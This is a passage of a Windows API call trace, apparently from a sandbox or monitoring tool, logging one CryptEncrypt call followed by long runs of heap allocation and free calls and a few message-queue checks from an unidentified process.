CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0260.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0260.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0260.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0260.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0260.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0260.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0260.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0260.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0260.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0260.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0260.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0260.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0260.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0260.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0260.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0260.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0260.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0260.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0260.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0260.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0260.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0260.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0260.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0260.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.397] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0260.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0260.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0260.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0260.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0260.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0260.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0260.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0260.398] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0260.398] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0260.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0260.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0260.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.399] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0260.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0260.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0260.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0260.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0260.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0260.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0260.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0260.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.400] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0260.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0260.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0260.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0260.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0260.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0260.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0260.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0260.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0260.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0260.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0260.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0260.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0260.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0260.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0260.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0260.402] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0260.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0260.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0260.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0260.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0260.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0260.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0260.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0260.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x34a20d0 [0260.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x34a2060 [0260.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | 